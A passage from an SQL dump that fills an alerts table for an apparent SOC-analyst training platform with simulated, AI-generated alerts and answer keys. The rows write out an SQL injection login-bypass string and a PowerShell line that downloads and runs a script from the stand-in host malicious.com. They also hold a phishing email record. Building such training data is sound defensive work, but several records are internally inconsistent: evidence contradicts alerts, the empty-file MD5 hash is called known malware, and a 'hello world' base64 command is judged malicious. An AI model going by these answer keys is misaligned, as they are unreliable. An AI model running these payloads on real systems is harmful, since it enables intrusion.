2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main 
source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1691, 'SQL Injection Attempt on Public-Facing Web Application', 'critical', 'Splunk', 'An SQL injection attempt was detected on the public-facing web application. The payload suggests an attempt to bypass authentication.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:11:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.50\",\"hostname\":\"webapp01\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 512 times for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the web application\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection payload attempting authentication bypass\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a known SQL injection technique, confirming malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1692, 'Unusual Activity Detected: Possible Internal Reconnaissance', 'medium', 'Elastic SIEM', 'A series of failed login attempts from an internal IP indicates potential reconnaissance or credential stuffing.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:52:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.5.5.5\",\"dst_ip\":\"10.5.5.10\",\"username\":\"user2\",\"hostname\":\"host01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.5.5.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of suspected reconnaissance source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.5.5.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The pattern of activity suggests credential stuffing or reconnaissance.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1693, 'Phishing Attempt via Malicious Email Link', 'high', 'Proofpoint', 'An email containing a suspicious link was detected, potentially delivering phishing content.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:05:20Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.3.3.3\",\"username\":\"jane.smith\",\"hostname\":\"mailserver01\",\"request_body\":null,\"command_line\":null,\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-link.com\"}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email domain used in previous phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious link\'s OSINT confirms phishing intent.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt via Malicious Email Link\",\"date\":\"2026-03-15T20:58:15.995Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1694, 'Failed SSH Login from Internal Network', 'low', 'Azure Sentinel', 'A failed SSH login attempt was logged from within the internal network, potentially indicating a user error.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"john.doe\",\"hostname\":\"sshserver02\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity originated from an internal IP with no signs of malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1695, 'Malware Command Execution Detected', 'critical', 'Wazuh', 'A potentially malicious command was executed on a host, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.100\",\"username\":\"malicious_user\",\"hostname\":\"infected_host\",\"request_body\":null,\"command_line\":\"powershell.exe -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\"\"}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a remote script, typical of malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.com/script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command execution is a known technique for downloading and executing malware.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1696, 'Process Hollowing Detected in explorer.exe', 'critical', 'CrowdStrike', 'Suspicious activity detected where explorer.exe is exhibiting process hollowing behavior. Anomalous process injection identified.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"C:\\\\Windows\\\\explorer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected in explorer.exe\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a common malware technique used to hide malicious code. 
The hash and behavior indicate a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1697, 'PowerShell Download Cradle Detected', 'high', 'Sysmon', 'A PowerShell script was executed with an encoded command, indicating a potential download cradle attack.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.5\",\"username\":\"asmith\",\"hostname\":\"finance-pc\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands suggests an attempt to obfuscate a download cradle attack, confirming the positive.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 
